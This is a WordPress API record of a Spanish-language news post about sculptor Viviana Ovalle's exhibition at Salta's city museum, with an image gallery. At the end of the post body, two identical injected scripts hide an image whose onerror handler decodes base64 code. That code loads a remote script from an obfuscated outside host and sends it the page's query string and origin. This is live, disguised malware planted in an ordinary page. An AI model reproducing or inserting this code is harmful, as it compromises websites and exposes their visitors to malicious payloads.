{"id":1821,"date":"2022-11-22T12:50:49","date_gmt":"2022-11-22T15:50:49","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1821"},"modified":"2025-08-14T00:29:47","modified_gmt":"2025-08-14T03:29:47","slug":"en-el-museo-de-la-ciudad-quedo-habilitada-la-muestra-de-la-escultora-viviana-ovalle","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1821","title":{"rendered":"En el Museo de la Ciudad qued\u00f3 habilitada la muestra de la escultora Viviana Ovalle"},"content":{"rendered":"\n<h5 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#db0e41\"><strong><em>Se trata de la exposici\u00f3n titulada \u00abLa creaci\u00f3n de cada d\u00eda\u00bb que forma parte del ciclo Maese, dedicado a los grandes artistas de la capital salte\u00f1a. Podr\u00e1 ser visitada de martes a domingos y los feriados, de 10 a 19, en La Florida 97.<\/em><\/strong><\/h5>\n\n\n\n<p>En el Museo de la Ciudad \u201cCasa de Hern\u00e1ndez\u201d qued\u00f3 habilitada la muestra \u201cLa creaci\u00f3n de cada d\u00eda\u201d de la escultora y docente Viviana Ovalle. Se trata de la segunda muestra del ciclo \u00abMaese: muestras dedicadas a grandes artistas de la ciudad\u201d, que organiza la Secretar\u00eda de Turismo y Cultura de la Municipalidad.<\/p>\n\n\n\n<p>Esta segunda exposici\u00f3n&nbsp;incluye una selecci\u00f3n de obras correspondientes a distintos momentos de la trayectoria&nbsp;art\u00edstica de Ovalle, lo que permite realizar un recorrido por su trabajo.<\/p>\n\n\n\n<p>La muestra podr\u00e1 ser visitada de martes a domingos y feriados de 10 a 19, en La Florida 97.<\/p>\n\n\n\n<p>\u201cAgradezco la invitaci\u00f3n de la Municipalidad, estoy muy feliz, agradezco a la intendenta, Bettina Romero, y a todo el equipo aqu\u00ed presente, a C\u00e9sar \u00c1lvarez y a mis hijos Juli\u00e1n y Manuela por ser el sost\u00e9n de mi vida. Estoy muy emocionada, haber hecho esta retrospectiva antol\u00f3gica de mi obra desde mis comienzos, tener que pedir a todos que me presten sus obras es realmente emocionante, se los agradezco&nbsp;mucho\u201d expres\u00f3, la artista Viviana Ovalle.<\/p>\n\n\n\n<p>En la apertura, el subsecretario de Cultura\u00a0de la Municipalidad, Rolando Arias, abri\u00f3 su discurso trasmitiendo los saludos de la intendenta, Bettina Romero, para la escultora y por ser el D\u00eda del\u00a0Escultor en la Argentina. \u00a0\u201cEs un honor para la Municipalidad poder realizar este ciclo con artistas nuestros,\u00a0ellos nos permiten disfrutar de su trayectoria y poder mostrarla y acercarla a\u00a0todos desde nuestra casa, el Museo de la Ciudad. Muchas gracias, Viviana Ovalle\u201d.<\/p>\n\n\n\n<h4 class=\"has-luminous-vivid-orange-color has-text-color wp-block-heading\">Galer\u00eda de Im\u00e1genes:<\/h4>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"680\" data-id=\"1822\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-1-1024x680.jpeg\" alt=\"\" class=\"wp-image-1822\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-1-1024x680.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-1-300x199.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-1-768x510.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-1-1536x1020.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-1-696x462.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-1-1068x710.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-1-632x420.jpeg 632w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-1.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"1824\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-2-1024x680.jpeg\" alt=\"\" class=\"wp-image-1824\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"680\" data-id=\"1823\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-3-1024x680.jpg\" alt=\"\" class=\"wp-image-1823\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-3-1024x680.jpg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-3-300x199.jpg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-3-768x510.jpg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-3-1536x1020.jpg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-3-696x462.jpg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-3-1068x710.jpg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-3-632x420.jpg 632w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-3.jpg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"680\" data-id=\"1825\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-4-1024x680.jpeg\" alt=\"\" class=\"wp-image-1825\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-4-1024x680.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-4-300x199.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-4-768x510.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-4-1536x1020.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-4-696x462.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-4-1068x710.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-4-632x420.jpeg 632w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-4.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"680\" data-id=\"1826\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-5-1024x680.jpeg\" alt=\"\" class=\"wp-image-1826\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-5-1024x680.jpeg 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-5-300x199.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-5-768x510.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-5-1536x1020.jpeg 1536w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-5-696x462.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-5-1068x710.jpeg 1068w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-5-632x420.jpeg 632w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/11\/esculturas-muestra-ovalle-5.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/municipalidadsalta.gob.ar\/noticias\/en-el-museo-de-la-ciudad-quedo-habilitada-la-muestra-de-la-escultora-viviana-ovalle\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/08\/Captura-web_26-8-2022_104031_prensa.municipalidadsalta.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-1375\" width=\"94\" height=\"37\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Se trata de la exposici\u00f3n titulada \u00abLa creaci\u00f3n de cada d\u00eda\u00bb que forma parte del ciclo Maese, dedicado a los grandes artistas de la capital salte\u00f1a. Podr\u00e1 ser visitada de martes a domingos y los feriados, de 10 a 19, en La Florida 97. En el Museo de la Ciudad \u201cCasa de Hern\u00e1ndez\u201d qued\u00f3 habilitada [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1822,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,9],"tags":[],"class_list":{"0":"post-1821","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1821"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1821"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1821\/revisions"}],"predecessor-version":[{"id":7269,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1821\/revisions\/7269"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1822"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1821"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1821"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1821"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}